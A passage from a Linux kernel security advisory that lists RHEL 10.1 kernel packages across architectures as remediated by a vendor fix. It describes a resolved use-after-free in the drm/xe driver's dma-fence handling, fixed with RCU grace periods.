| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
In the Linux kernel, the following vulnerability has been resolved: drm/xe: Make dma-fences compliant with the safe access rules Xe can free some of the data pointed to by the dma-fences it exports. Most notably the timeline name can get freed if userspace closes the associated submit queue. At the same time the fence could have been exported to a third party (for example a sync_fence fd) which will then cause an use- after-free on subsequent access. To make this safe we need to make the driver compliant with the newly documented dma-fence rules. Driver has to ensure a RCU grace period between signalling a fence and freeing any data pointed to by said fence. For the timeline name we simply make the queue be freed via kfree_rcu and for the shared lock associated with multiple queues we add a RCU grace period before freeing the per GT structure holding the lock.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
